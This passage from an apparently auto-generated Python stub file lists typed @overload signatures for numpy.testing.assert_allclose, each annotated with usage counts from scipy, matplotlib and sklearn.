    """
    ...
@overload
def assert_allclose(
    actual: numpy.ndarray, desired: List[int], rtol: float, atol: float
) -> None:
    """
    usage.scipy: 3
    """
    ...
@overload
def assert_allclose(actual: numpy.float64, desired: List[float], atol: float) -> None:
    """
    usage.scipy: 2
    """
    ...
@overload
def assert_allclose(actual: numpy.ndarray, desired: List[float], rtol: float) -> None:
    """
    usage.matplotlib: 3
    usage.scipy: 49
    usage.sklearn: 6
    """
    ...
# NOTE(review): auto-generated assert_allclose @overload stubs (docstrings are
# recorded per-project usage counts); "-> None" added since numpy.testing.
# assert_allclose returns None and raises AssertionError on mismatch.
@overload
def assert_allclose(
    actual: List[float], desired: List[float], rtol: float, atol: float
) -> None:
    """
    usage.scipy: 4
    """
    ...
@overload
def assert_allclose(actual: float, desired: float, rtol: float, atol: float) -> None:
    """
    usage.scipy: 1
    """
    ...
@overload
def assert_allclose(
    actual: numpy.float64, desired: float, rtol: float, atol: float, err_msg: str
) -> None:
    """
    usage.scipy: 1
    """
    ...
@overload
def assert_allclose(
    actual: numpy.ndarray, desired: List[int], rtol: float, atol: float, err_msg: str
) -> None:
    """
    usage.scipy: 6
    """
    ...
@overload
def assert_allclose(
    actual: numpy.float64, desired: int, rtol: float, atol: float, err_msg: str
) -> None:
    """
    usage.scipy: 1
    """
    ...
@overload
def assert_allclose(
    actual: numpy.ndarray, desired: List[float], rtol: float, atol: float, err_msg: str
) -> None:
    """
    usage.scipy: 2
    """
    ...
@overload
def assert_allclose(
    actual: numpy.float64, desired: numpy.int64, rtol: float, atol: float, err_msg: str
) -> None:
    """
    usage.scipy: 1
    """
    ...
@overload
def assert_allclose(
    actual: numpy.ndarray,
    desired: List[Union[float, int]],
    rtol: float,
    atol: float,
    err_msg: str,
) -> None:
    """
    usage.scipy: 3
    """
    ...
@overload
def assert_allclose(
    actual: numpy.ndarray,
    desired: List[Union[int, float]],
    rtol: float,
    atol: float,
    err_msg: str,
) -> None:
    """
    usage.scipy: 1
    """
    ...
@overload
def assert_allclose(
    actual: numpy.float64,
    desired: numpy.float64,
    rtol: float,
    atol: float,
    err_msg: str,
) -> None:
    """
    usage.scipy: 2
    """
    ...
@overload
def assert_allclose(actual: numpy.int64, desired: numpy.int64, rtol: float) -> None:
    """
    usage.scipy: 2
    """
    ...
@overload
def assert_allclose(actual: numpy.ndarray, desired: List[Union[int, float]]) -> None:
    """
    usage.matplotlib: 2
    usage.scipy: 10
    """
    ...
@overload
def assert_allclose(actual: numpy.ndarray, desired: numpy.complex128) -> None:
    """
    usage.scipy: 2
    """
    ...
@overload
def assert_allclose(actual: numpy.float64, desired: numpy.float64, atol: float) -> None:
    """
    usage.scipy: 40
    usage.sklearn: 3
    """
    ...
@overload
def assert_allclose(actual: int, desired: int, atol: float) -> None:
    """
    usage.scipy: 1
    """
    ...
@overload
def assert_allclose(
    actual: List[numpy.ndarray],
    desired: List[List[Union[int, float]]],
    rtol: float,
    atol: float,
) -> None:
    """
    usage.scipy: 2
    """
    ...
@overload
def assert_allclose(
    actual: List[numpy.ndarray], desired: List[List[float]], rtol: float, atol: float
) -> None:
    """
    usage.scipy: 7
    """
    ...
@overload
def assert_allclose(actual: numpy.ndarray, desired: List[float], err_msg: str) -> None:
    """
    usage.scipy: 1
    """
    ...
@overload
def assert_allclose(actual: numpy.float64, desired: float, err_msg: str) -> None:
    """
    usage.scipy: 2
    usage.sklearn: 1
    """
    ...
@overload
def assert_allclose(actual: numpy.ndarray, desired: Tuple[int, int], atol: float) -> None:
    """
    usage.scipy: 4
    """
    ...
@overload
def assert_allclose(actual: float, desired: float, atol: float, err_msg: str) -> None:
    """
    usage.scipy: 4
    """
    ...
@overload
def assert_allclose(actual: numpy.float64, desired: float, atol: float, err_msg: str) -> None:
    """
    usage.scipy: 4
    """
    ...
@overload
def assert_allclose(
    actual: numpy.float64, desired: numpy.float64, atol: float, err_msg: str
) -> None:
    """
    usage.scipy: 1
    """
    ...
@overload
def assert_allclose(
    actual: float,
    desired: float,
    rtol: numpy.float64,
    atol: numpy.float64,
    err_msg: str,
) -> None:
    """
    usage.scipy: 2
    """
    ...
@overload
def assert_allclose(actual: float, desired: int, err_msg: str) -> None:
    """
    usage.scipy: 1
    """
    ...
@overload
def assert_allclose(
    actual: numpy.float64,
    desired: float,
    rtol: numpy.float64,
    atol: numpy.float64,
    err_msg: str,
) -> None:
    """
    usage.scipy: 2
    """
    ...
@overload
def assert_allclose(
    actual: numpy.ndarray,
    desired: Tuple[
        float, float, float, float, float, float, float, float, float, float
    ],
) -> None:
    """
    usage.scipy: 3
    """
    ...
@overload
def assert_allclose(
    actual: float,
    desired: float,
    rtol: numpy.float64,
    atol: numpy.float64,
    err_msg: Literal["method bisect"],
) -> None:
    """
    usage.scipy: 1
    """
    ...
@overload
def assert_allclose(
    actual: float,
    desired: float,
    rtol: numpy.float64,
    atol: numpy.float64,
    err_msg: Literal["method ridder"],
) -> None:
    """
    usage.scipy: 1
    """
    ...
@overload
def assert_allclose(actual: float, desired: float, rtol: numpy.float64, atol: float) -> None:
    """
    usage.scipy: 1
    """
    ...
@overload
def assert_allclose(actual: complex, desired: int, atol: float) -> None:
    """
    usage.scipy: 1
    """
    ...
@overload
def assert_allclose(actual: float, desired: int) -> None:
    """
    usage.scipy: 5
    usage.sklearn: 1
    """
    ...
@overload
def assert_allclose(actual: float, desired: int, rtol: numpy.float64, atol: float) -> None:
    """
    usage.scipy: 4
    """
    ...
@overload
def assert_allclose(
    actual: numpy.ndarray, desired: int, rtol: numpy.float64, atol: float
) -> None:
    """
    usage.scipy: 4
    """
    ...
@overload
def assert_allclose(
    actual: numpy.ndarray, desired: List[Union[float, int]], rtol: float
) -> None:
    """
    usage.scipy: 5
    """
    ...
@overload
def assert_allclose(
    actual: numpy.ndarray, desired: List[List[Union[int, float]]], rtol: float
) -> None:
    """
    usage.scipy: 2
    """
    ...
@overload
def assert_allclose(actual: numpy.ndarray, desired: List[complex]) -> None:
    """
    usage.scipy: 7
    """
    ...
@overload
def assert_allclose(actual: numpy.ndarray, desired: List[Union[int, complex]]) -> None:
    """
    usage.scipy: 2
    """
    ...
@overload
def assert_allclose(
    actual: numpy.ndarray,
    desired: List[List[Union[int, float]]],
    rtol: float,
    atol: float,
) -> None:
    """
    usage.scipy: 1
    """
    ...
@overload
def assert_allclose(actual: List[int], desired: numpy.ndarray) -> None:
    """
    usage.scipy: 4
    """
    ...
@overload
def assert_allclose(actual: Tuple[int], desired: numpy.ndarray) -> None:
    """
    usage.scipy: 3
    """
    ...
@overload
def assert_allclose(actual: Tuple[int, int, int], desired: numpy.ndarray) -> None:
    """
    usage.scipy: 3
    """
    ...
@overload
def assert_allclose(
    actual: numpy.ndarray, desired: List[Union[int, float]], rtol: float
) -> None:
    """
    usage.scipy: 14
    usage.sklearn: 1
    """
    ...
@overload
def assert_allclose(actual: numpy.float64, desired: int, rtol: float) -> None:
    """
    usage.scipy: 12
    usage.sklearn: 1
    """
    ...
@overload
def assert_allclose(actual: float, desired: float, rtol: float) -> None:
    """
    usage.scipy: 19
    usage.sklearn: 9
    """
    ...
@overload
def assert_allclose(actual: List[numpy.complex128], desired: List[numpy.complex128]) -> None:
    """
    usage.scipy: 4
    """
    ...
@overload
def assert_allclose(actual: int, desired: numpy.ndarray) -> None:
    """
    usage.scipy: 1
    """
    ...
@overload
def assert_allclose(actual: List[Union[int, numpy.float64]], desired: numpy.ndarray) -> None:
    """
    usage.scipy: 1
    """
    ...
@overload
def assert_allclose(actual: list, desired: list, rtol: float) -> None:
    """
    usage.scipy: 1
    """
    ...
@overload
def assert_allclose(
    actual: List[numpy.int64], desired: List[numpy.complex128], rtol: float
) -> None:
    """
    usage.scipy: 1
    """
    ...
@overload
def assert_allclose(
    actual: List[numpy.complex128], desired: List[numpy.complex128], rtol: float
) -> None:
    """
    usage.scipy: 9
    """
    ...
@overload
def assert_allclose(actual: numpy.ndarray, desired: Tuple[int, float], rtol: float) -> None:
    """
    usage.scipy: 1
    """
    ...
@overload
def assert_allclose(actual: numpy.ndarray, desired: Tuple[int, numpy.float64]) -> None:
    """
    usage.scipy: 1
    """
    ...
@overload
def assert_allclose(actual: int, desired: numpy.float64, rtol: float) -> None:
    """
    usage.scipy: 1
    """
    ...
@overload
def assert_allclose(actual: float, desired: numpy.float64, rtol: float) -> None:
    """
    usage.scipy: 2
    usage.sklearn: 7
    """
    ...
@overload
def assert_allclose(
    actual: Tuple[numpy.ndarray, numpy.ndarray],
    desired: Tuple[numpy.ndarray, numpy.ndarray],
) -> None:
    """
    usage.scipy: 10
    """
    ...
@overload
def assert_allclose(
    actual: List[numpy.complex128], desired: List[complex], rtol: float
) -> None:
    """
    usage.scipy: 24
    """
    ...
@overload
def assert_allclose(actual: List[numpy.complex128], desired: List[complex]) -> None:
    """
    usage.scipy: 3
    """
    ...
@overload
def assert_allclose(
    actual: List[numpy.complex128], desired: List[Union[complex, float]], rtol: float
) -> None:
    """
    usage.scipy: 2
    """
    ...
@overload
def assert_allclose(
    actual: List[numpy.complex128], desired: List[Union[complex, int]], rtol: float
) -> None:
    """
    usage.scipy: 1
    """
    ...
@overload
def assert_allclose(
    actual: numpy.ndarray,
    desired: List[numpy.ndarray],
    err_msg: Literal["bessel(2,...)"],
) -> None:
    """
    usage.scipy: 1
    """
    ...
@overload
def assert_allclose(
    actual: numpy.ndarray, desired: numpy.ndarray, err_msg: Literal["bessel(3,...)"]
) -> None:
    """
    usage.scipy: 1
    """
    ...
# NOTE(review): auto-generated assert_allclose @overload stubs (docstrings are
# recorded per-project usage counts); "-> None" added since numpy.testing.
# assert_allclose returns None and raises AssertionError on mismatch.
@overload
def assert_allclose(
    actual: numpy.ndarray, desired: numpy.ndarray, err_msg: Literal["bessel(4,...)"]
) -> None:
    """
    usage.scipy: 1
    """
    ...
@overload
def assert_allclose(
    actual: numpy.ndarray,
    desired: List[numpy.ndarray],
    err_msg: Literal["butter(2,...)"],
) -> None:
    """
    usage.scipy: 1
    """
    ...
@overload
def assert_allclose(
    actual: numpy.ndarray, desired: numpy.ndarray, err_msg: Literal["butter(3,...)"]
) -> None:
    """
    usage.scipy: 1
    """
    ...
@overload
def assert_allclose(
    actual: numpy.ndarray, desired: numpy.ndarray, err_msg: Literal["butter(4,...)"]
) -> None:
    """
    usage.scipy: 1
    """
    ...
@overload
def assert_allclose(
    actual: numpy.ndarray,
    desired: List[numpy.ndarray],
    err_msg: Literal["cheby1(2,...)"],
) -> None:
    """
    usage.scipy: 1
    """
    ...
@overload
def assert_allclose(
    actual: numpy.ndarray, desired: numpy.ndarray, err_msg: Literal["cheby1(3,...)"]
) -> None:
    """
    usage.scipy: 1
    """
    ...
@overload
def assert_allclose(
    actual: numpy.ndarray, desired: numpy.ndarray, err_msg: Literal["cheby1(4,...)"]
) -> None:
    """
    usage.scipy: 1
    """
    ...
@overload
def assert_allclose(
    actual: numpy.ndarray,
    desired: List[numpy.ndarray],
    err_msg: Literal["cheby2(2,...)"],
) -> None:
    """
    usage.scipy: 1
    """
    ...
@overload
def assert_allclose(
    actual: numpy.ndarray, desired: numpy.ndarray, err_msg: Literal["cheby2(3,...)"]
) -> None:
    """
    usage.scipy: 1
    """
    ...
@overload
def assert_allclose(
    actual: numpy.ndarray, desired: numpy.ndarray, err_msg: Literal["cheby2(4,...)"]
) -> None:
    """
    usage.scipy: 1
    """
    ...
@overload
def assert_allclose(
    actual: numpy.ndarray,
    desired: List[numpy.ndarray],
    err_msg: Literal["ellip(2,...)"],
) -> None:
    """
    usage.scipy: 1
    """
    ...
@overload
def assert_allclose(
    actual: numpy.ndarray, desired: numpy.ndarray, err_msg: Literal["ellip(3,...)"]
) -> None:
    """
    usage.scipy: 1
    """
    ...
@overload
def assert_allclose(
    actual: numpy.ndarray, desired: numpy.ndarray, err_msg: Literal["ellip(4,...)"]
) -> None:
    """
    usage.scipy: 1
    """
    ...
@overload
def assert_allclose(actual: numpy.ndarray, desired: List[List[int]], rtol: float) -> None:
    """
    usage.scipy: 39
    """
    ...
@overload
def assert_allclose(actual: numpy.float64, desired: int, err_msg: str) -> None:
    """
    usage.scipy: 1
    """
    ...
@overload
def assert_allclose(
    actual: Tuple[numpy.ndarray, numpy.ndarray, numpy.ndarray, numpy.ndarray],
    desired: List[Tuple[float]],
) -> None:
    """
    usage.scipy: 2
    """
    ...
@overload
def assert_allclose(actual: List[numpy.float64], desired: List[numpy.float64]) -> None:
    """
    usage.matplotlib: 1
    usage.scipy: 1
    """
    ...
@overload
def assert_allclose(
    actual: numpy.ndarray,
    desired: numpy.ndarray,
    atol: float,
    err_msg: Literal["order=1"],
) -> None:
    """
    usage.scipy: 1
    """
    ...
@overload
def assert_allclose(
    actual: numpy.ndarray,
    desired: numpy.ndarray,
    atol: float,
    err_msg: Literal["order=2"],
) -> None:
    """
    usage.scipy: 1
    """
    ...
@overload
def assert_allclose(
    actual: numpy.ndarray,
    desired: numpy.ndarray,
    atol: float,
    err_msg: Literal["order=3"],
) -> None:
    """
    usage.scipy: 1
    """
    ...
@overload
def assert_allclose(
    actual: numpy.ndarray,
    desired: numpy.ndarray,
    atol: float,
    err_msg: Literal["order=4"],
) -> None:
    """
    usage.scipy: 1
    """
    ...
@overload
def assert_allclose(
    actual: numpy.ndarray,
    desired: numpy.ndarray,
    atol: float,
    err_msg: Literal["order=5"],
) -> None:
    """
    usage.scipy: 1
    """
    ...
@overload
def assert_allclose(
    actual: numpy.ndarray, desired: numpy.float64, rtol: float, atol: int
) -> None:
    """
    usage.scipy: 4
    """
    ...
@overload
def assert_allclose(
    actual: numpy.ndarray, desired: numpy.ndarray, err_msg: Literal["boxcar, 0"]
) -> None:
    """
    usage.scipy: 7
    """
    ...
@overload
def assert_allclose(
    actual: numpy.ndarray, desired: numpy.ndarray, err_msg: Literal["boxcar, 9"]
) -> None:
    """
    usage.scipy: 2
    """
    ...
@overload
def assert_allclose(
    actual: numpy.ndarray, desired: numpy.ndarray, err_msg: Literal["bartlett, 26"]
) -> None:
    """
    usage.scipy: 2
    """
    ...
@overload
def assert_allclose(
    actual: numpy.ndarray, desired: numpy.ndarray, err_msg: Literal["hann, 128"]
) -> None:
    """
    usage.scipy: 8
    """
    ...
@overload
def assert_allclose(
    actual: numpy.ndarray,
    desired: numpy.ndarray,
    err_msg: Literal["('tukey', 0.5), 64"],
) -> None:
    """
    usage.scipy: 5
    """
    ...
@overload
def assert_allclose(
    actual: numpy.ndarray, desired: numpy.ndarray, err_msg: Literal["hann, 255"]
) -> None:
    """
    usage.scipy: 2
    """
    ...
@overload
def assert_allclose(
    actual: numpy.ndarray, desired: numpy.ndarray, err_msg: Literal["boxcar, 3"]
) -> None:
    """
    usage.scipy: 2
    """
    ...
@overload
def assert_allclose(
    actual: numpy.ndarray, desired: numpy.ndarray, err_msg: Literal["bartlett, 37"]
) -> None:
    """
    usage.scipy: 2
    """
    ...
@overload
def assert_allclose(
    actual: numpy.ndarray, desired: numpy.ndarray, err_msg: Literal["hann, 127"]
) -> None:
    """
    usage.scipy: 2
    """
    ...
@overload
def assert_allclose(
    actual: numpy.ndarray,
    desired: numpy.ndarray,
    err_msg: Literal["('tukey', 0.5), 14"],
) -> None:
    """
    usage.scipy: 2
    """
    ...
@overload
def assert_allclose(
    actual: numpy.ndarray, desired: numpy.ndarray, err_msg: Literal["hann, 5"]
) -> None:
    """
    usage.scipy: 2
    """
    ...
@overload
def assert_allclose(
    actual: numpy.ndarray,
    desired: numpy.ndarray,
    rtol: float,
    atol: float,
    err_msg: Literal["hann, 128"],
) -> None:
    """
    usage.scipy: 1
    """
    ...
@overload
def assert_allclose(
    actual: numpy.ndarray, desired: numpy.ndarray, err_msg: Literal["boxcar, 10, 0"]
) -> None:
    """
    usage.scipy: 2
    """
    ...
@overload
def assert_allclose(
    actual: numpy.ndarray, desired: numpy.ndarray, err_msg: Literal["boxcar, 10, 9"]
) -> None:
    """
    usage.scipy: 2
    """
    ...
@overload
def assert_allclose(
    actual: numpy.ndarray, desired: numpy.ndarray, err_msg: Literal["bartlett, 51, 26"]
) -> None:
    """
    usage.scipy: 2
    """
    ...
@overload
def assert_allclose(
    actual: numpy.ndarray, desired: numpy.ndarray, err_msg: Literal["hann, 256, 128"]
) -> None:
    """
    usage.scipy: 2
    """
    ...
@overload
def assert_allclose(
    actual: numpy.ndarray, desired: numpy.ndarray, err_msg: Literal["hann, 256, 255"]
) -> None:
    """
    usage.scipy: 4
    """
    ...
@overload
def assert_allclose(
    actual: numpy.ndarray, desired: numpy.ndarray, err_msg: Literal["boxcar, 0, even"]
) -> None:
    """
    usage.scipy: 2
    """
    ...
@overload
def assert_allclose(
    actual: numpy.ndarray, desired: numpy.ndarray, err_msg: Literal["boxcar, 0, odd"]
) -> None:
    """
    usage.scipy: 2
    """
    ...
@overload
def assert_allclose(
    actual: numpy.ndarray,
    desired: numpy.ndarray,
    err_msg: Literal["boxcar, 0, constant"],
) -> None:
    """
    usage.scipy: 2
    """
    ...
@overload
def assert_allclose(
    actual: numpy.ndarray, desired: numpy.ndarray, err_msg: Literal["boxcar, 0, zeros"]
) -> None:
    """
    usage.scipy: 2
    """
    ...
@overload
def assert_allclose(
    actual: numpy.ndarray, desired: numpy.ndarray, err_msg: Literal["boxcar, 9, even"]
) -> None:
    """
    usage.scipy: 2
    """
    ...
@overload
def assert_allclose(
    actual: numpy.ndarray, desired: numpy.ndarray, err_msg: Literal["boxcar, 9, odd"]
) -> None:
    """
    usage.scipy: 2
    """
    ...
@overload
def assert_allclose(
    actual: numpy.ndarray,
    desired: numpy.ndarray,
    err_msg: Literal["boxcar, 9, constant"],
) -> None:
    """
    usage.scipy: 2
    """
    ...
@overload
def assert_allclose(
    actual: numpy.ndarray, desired: numpy.ndarray, err_msg: Literal["boxcar, 9, zeros"]
) -> None:
    """
    usage.scipy: 2
    """
    ...
@overload
def assert_allclose(
    actual: numpy.ndarray,
    desired: numpy.ndarray,
    err_msg: Literal["istft transpose plus"],
) -> None:
    """
    usage.scipy: 1
    """
    ...
@overload
def assert_allclose(
    actual: numpy.ndarray, desired: List[Union[float, int]], atol: float
) -> None:
    """
    usage.scipy: 3
    """
    ...
@overload
def assert_allclose(
    actual: numpy.ndarray,
    desired: List[List[float]],
    atol: float,
    err_msg: Tuple[int, float, int],
) -> None:
    """
    usage.scipy: 3
    """
    ...
@overload
def assert_allclose(
    actual: numpy.ndarray,
    desired: List[float],
    rtol: float,
    atol: float,
    err_msg: Tuple[int, float, int],
) -> None:
    """
    usage.scipy: 3
    """
    ...
@overload
def assert_allclose(
    actual: numpy.ndarray,
    desired: List[List[float]],
    atol: float,
    err_msg: Tuple[int, int, int],
) -> None:
    """
    usage.scipy: 1
    """
    ...
@overload
def assert_allclose(
    actual: numpy.ndarray,
    desired: List[float],
    rtol: float,
    atol: float,
    err_msg: Tuple[int, int, int],
) -> None:
    """
    usage.scipy: 1
    """
    ...
# NOTE(review): auto-generated assert_allclose @overload stubs (docstrings are
# recorded per-project usage counts); "-> None" added since numpy.testing.
# assert_allclose returns None and raises AssertionError on mismatch.
@overload
def assert_allclose(
    actual: numpy.ndarray, desired: List[List[Union[float, int]]], atol: float
) -> None:
    """
    usage.scipy: 2
    """
    ...
@overload
def assert_allclose(
    actual: numpy.ndarray,
    desired: numpy.ndarray,
    rtol: numpy.float64,
    atol: numpy.float64,
    err_msg: str,
) -> None:
    """
    usage.scipy: 10
    """
    ...
@overload
def assert_allclose(actual: numpy.float64, desired: int, atol: numpy.float32) -> None:
    """
    usage.scipy: 1
    """
    ...
@overload
def assert_allclose(actual: numpy.ndarray, desired: int, atol: numpy.float32) -> None:
    """
    usage.scipy: 1
    """
    ...
@overload
def assert_allclose(actual: numpy.float64, desired: int, atol: numpy.float64) -> None:
    """
    usage.scipy: 7
    """
    ...
@overload
def assert_allclose(
    actual: numpy.float64,
    desired: numpy.float64,
    err_msg: Literal["array([1, 1, 1, 1])"],
) -> None:
    """
    usage.scipy: 1
    """
    ...
@overload
def assert_allclose(
    actual: numpy.float64,
    desired: numpy.float64,
    err_msg: Literal["array([1, 1, 1, 0])"],
) -> None:
    """
    usage.scipy: 1
    """
    ...
@overload
def assert_allclose(
    actual: numpy.float64,
    desired: numpy.float64,
    err_msg: Literal["array([1, 1, 0, 0])"],
) -> None:
    """
    usage.scipy: 1
    """
    ...
@overload
def assert_allclose(
    actual: numpy.float64,
    desired: numpy.float64,
    err_msg: Literal["array([1, 0, 0, 0])"],
) -> None:
    """
    usage.scipy: 1
    """
    ...
@overload
def assert_allclose(actual: List[numpy.complex128], desired: Tuple[int, int, int]) -> None:
    """
    usage.scipy: 2
    """
    ...
@overload
def assert_allclose(actual: numpy.ndarray, desired: Tuple[int, int, int]) -> None:
    """
    usage.scipy: 1
    """
    ...
@overload
def assert_allclose(actual: numpy.ndarray, desired: List[List[Union[int, float]]]) -> None:
    """
    usage.scipy: 1
    usage.sklearn: 1
    """
    ...
@overload
def assert_allclose(actual: numpy.int64, desired: numpy.float64) -> None:
    """
    usage.scipy: 5
    """
    ...
@overload
def assert_allclose(actual: numpy.matrix, desired: numpy.matrix, atol: numpy.float64) -> None:
    """
    usage.scipy: 13
    """
    ...
@overload
def assert_allclose(actual: numpy.matrix, desired: numpy.matrix, atol: numpy.float128) -> None:
    """
    usage.scipy: 2
    """
    ...
@overload
def assert_allclose(
    actual: numpy.ndarray, desired: numpy.ndarray, rtol: bool, atol: float
) -> None:
    """
    usage.scipy: 1
    """
    ...
@overload
def assert_allclose(
    actual: numpy.ndarray, desired: List[List[Union[float, numpy.float64]]]
) -> None:
    """
    usage.scipy: 1
    """
    ...
@overload
def assert_allclose(
    actual: numpy.ndarray, desired: List[List[Union[numpy.float64, int]]]
) -> None:
    """
    usage.scipy: 1
    """
    ...
@overload
def assert_allclose(actual: numpy.ndarray, desired: List[Union[numpy.float64, float]]) -> None:
    """
    usage.scipy: 2
    usage.sklearn: 1
    """
    ...
@overload
def assert_allclose(actual: numpy.ndarray, desired: List[Union[int, numpy.float64]]) -> None:
    """
    usage.scipy: 1
    """
    ...
@overload
def assert_allclose(actual: float, desired: int, rtol: int, atol: float) -> None:
    """
    usage.scipy: 4
    """
    ...
@overload
def assert_allclose(actual: numpy.ndarray, desired: float, rtol: bool, atol: float) -> None:
    """
    usage.scipy: 1
    """
    ...
@overload
def assert_allclose(actual: float, desired: float, rtol: float, err_msg: str) -> None:
    """
    usage.scipy: 4
    """
    ...
@overload
def assert_allclose(actual: numpy.ndarray, desired: List[Tuple[float, float]]) -> None:
    """
    usage.scipy: 2
    """
    ...
@overload
def assert_allclose(actual: List[numpy.ndarray], desired: List[numpy.ndarray]) -> None:
    """
    usage.scipy: 10
    """
    ...
@overload
def assert_allclose(actual: numpy.ndarray, desired: int, rtol: float) -> None:
    """
    usage.scipy: 2
    """
    ...
@overload
def assert_allclose(actual: numpy.ndarray, desired: List[List[int]]) -> None:
    """
    usage.scipy: 1
    usage.sklearn: 5
    """
    ...
@overload
def assert_allclose(actual: numpy.float64, desired: float, rtol: int, atol: int) -> None:
    """
    usage.scipy: 1
    """
    ...
@overload
def assert_allclose(actual: numpy.ndarray, desired: int, rtol: int, atol: float) -> None:
    """
    usage.scipy: 4
    """
    ...
@overload
def assert_allclose(actual: List[int], desired: numpy.ndarray, atol: float) -> None:
    """
    usage.scipy: 1
    """
    ...
@overload
def assert_allclose(actual: numpy.ndarray, desired: List[complex], rtol: float) -> None:
    """
    usage.scipy: 1
    """
    ...
@overload
def assert_allclose(
    actual: numpy.float64,
    desired: numpy.complex128,
    rtol: float,
    atol: float,
    err_msg: Tuple[int, int],
) -> None:
    """
    usage.scipy: 2
    """
    ...
@overload
def assert_allclose(
    actual: numpy.float64,
    desired: numpy.complex128,
    rtol: float,
    atol: float,
    err_msg: Tuple[int, float],
) -> None:
    """
    usage.scipy: 2
    """
    ...
@overload
def assert_allclose(
    actual: numpy.float64,
    desired: numpy.complex128,
    rtol: float,
    atol: float,
    err_msg: Tuple[float, float],
) -> None:
    """
    usage.scipy: 2
    """
    ...
@overload
def assert_allclose(
    actual: numpy.float64,
    desired: numpy.complex128,
    rtol: float,
    atol: float,
    err_msg: Tuple[float, int],
) -> None:
    """
    usage.scipy: 2
    """
    ...
@overload
def assert_allclose(
    actual: numpy.float64,
    desired: numpy.complex128,
    rtol: float,
    atol: float,
    err_msg: Tuple[numpy.float64, float],
) -> None:
    """
    usage.scipy: 1
    """
    ...
@overload
def assert_allclose(actual: numpy.complex128, desired: float) -> None:
    """
    usage.scipy: 12
    """
    ...
@overload
def assert_allclose(
    actual: numpy.float64, desired: numpy.float64, atol: numpy.float64, err_msg: float
) -> None:
    """
    usage.scipy: 2
    """
    ...
@overload
def assert_allclose(
    actual: numpy.float64,
    desired: numpy.float64,
    atol: numpy.float64,
    err_msg: Tuple[float, float],
) -> None:
    """
    usage.scipy: 1
    """
    ...
@overload
def assert_allclose(
    actual: numpy.complex128,
    desired: numpy.complex128,
    atol: numpy.float64,
    err_msg: Tuple[float, complex],
) -> None:
    """
    usage.scipy: 1
    """
    ...
@overload
def assert_allclose(
    actual: numpy.float64, desired: numpy.float64, rtol: int, atol: numpy.float64
) -> None:
    """
    usage.scipy: 1
    """
    ...
@overload
def assert_allclose(actual: float, desired: numpy.float64, err_msg: str) -> None:
    """
    usage.scipy: 1
    usage.sklearn: 1
    """
    ...
@overload
def assert_allclose(
    actual: float, desired: numpy.float64, err_msg: Literal["(-10.0, 1.0) dd None"]
) -> None:
    """
    usage.scipy: 1
    """
    ...
@overload
def assert_allclose(
    actual: float, desired: numpy.float64, err_msg: Literal["(-1.0, -1.0) dd None"]
) -> None:
    """
    usage.scipy: 1
    """
    ...
@overload
def assert_allclose(
    actual: float, desired: numpy.float64, err_msg: Literal["(-1.0, 1.0) dd None"]
) -> None:
    """
    usage.scipy: 1
    """
    ...
@overload
def assert_allclose(
    actual: float, desired: numpy.float64, err_msg: Literal["(-1.0, 10.0) dd None"]
) -> None:
    """
    usage.scipy: 1
    """
    ...
@overload
def assert_allclose(
    actual: float, desired: numpy.float64, err_msg: Literal["(1.0, -10.0) dd None"]
) -> None:
    """
    usage.scipy: 1
    """
    ...
@overload
def assert_allclose(
    actual: float, desired: numpy.float64, err_msg: Literal["(1.0, -1.0) dd None"]
) -> None:
    """
    usage.scipy: 1
    """
    ...
@overload
def assert_allclose(
    actual: float, desired: numpy.float64, err_msg: Literal["(1.0, 1.0) dd None"]
) -> None:
    """
    usage.scipy: 1
    """
    ...
@overload
def assert_allclose(
    actual: float, desired: numpy.float64, err_msg: Literal["(1.0, 10.0) dd None"]
) -> None:
    """
    usage.scipy: 1
    """
    ...
@overload
def assert_allclose(
    actual: float, desired: numpy.float64, err_msg: Literal["(10.0, -1.0) dd None"]
) -> None:
    """
    usage.scipy: 1
    """
    ...
@overload
def assert_allclose(
    actual: float, desired: numpy.float64, err_msg: Literal["(10.0, 1.0) dd None"]
) -> None:
    """
    usage.scipy: 1
    """
    ...
@overload
def assert_allclose(
    actual: float, desired: numpy.float64, err_msg: Literal["(10.0, 10.0) dd None"]
) -> None:
    """
    usage.scipy: 1
    """
    ...
@overload
def assert_allclose(
    actual: Tuple[float, float, float, float],
    desired: Tuple[numpy.float64, numpy.float64, numpy.float64, numpy.float64],
    err_msg: str,
) -> None:
    """
    usage.scipy: 1
    """
    ...
@overload
def assert_allclose(
    actual: Tuple[float, float, float, float],
    desired: Tuple[numpy.float64, numpy.float64, numpy.float64, numpy.float64],
    err_msg: Literal["(-1.0,) d ['double']"],
) -> None:
    """
    usage.scipy: 1
    """
    ...
@overload
def assert_allclose(
    actual: Tuple[float, float, float, float],
    desired: Tuple[numpy.float64, numpy.float64, numpy.float64, numpy.float64],
    err_msg: Literal["(1.0,) d ['double']"],
) -> None:
    """
    usage.scipy: 1
    """
    ...
@overload
def assert_allclose(
    actual: Tuple[float, float, float, float],
    desired: Tuple[numpy.float64, numpy.float64, numpy.float64, numpy.float64],
    err_msg: Literal["(10.0,) d ['double']"],
) -> None:
    """
    usage.scipy: 1
    """
    ...
@overload
def assert_allclose(
    actual: Tuple[complex, complex, complex, complex],
    desired: Tuple[
        numpy.complex128, numpy.complex128, numpy.complex128, numpy.complex128
    ],
    err_msg: str,
) -> None:
    """
    usage.scipy: 1
    """
    ...
@overload
def assert_allclose(
    actual: float, desired: numpy.float64, err_msg: Literal["(-10.0,) d None"]
) -> None:
    """
    usage.scipy: 1
    """
    ...
@overload
def assert_allclose(
    actual: float, desired: numpy.float64, err_msg: Literal["(-1.0,) d None"]
) -> None:
    """
    usage.scipy: 1
    """
    ...
@overload
def assert_allclose(
    actual: float, desired: numpy.float64, err_msg: Literal["(1.0,) d None"]
) -> None:
    """
    usage.scipy: 1
    """
    ...
@overload
def assert_allclose(
    actual: float, desired: numpy.float64, err_msg: Literal["(10.0,) d None"]
) -> None:
    """
    usage.scipy: 1
    """
    ...
@overload
def assert_allclose(
    actual: float, desired: numpy.float64, err_msg: Literal["(-1.0,) d ['double']"]
) -> None:
    """
    usage.scipy: 1
    """
    ...
@overload
def assert_allclose(
    actual: float, desired: numpy.float64, err_msg: Literal["(1.0,) d ['double']"]
) -> None:
    """
    usage.scipy: 1
    """
    ...
@overload
def assert_allclose(
actual: float, desired: numpy.float64, err_msg: Literal["(10.0,) d ['double']"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(actual: complex, desired: numpy.complex128, err_msg: str):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: Tuple[float, float, float, float],
desired: Tuple[numpy.float64, numpy.float64, numpy.float64, numpy.float64],
err_msg: Literal["(-10.0, 1.0) dd None"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
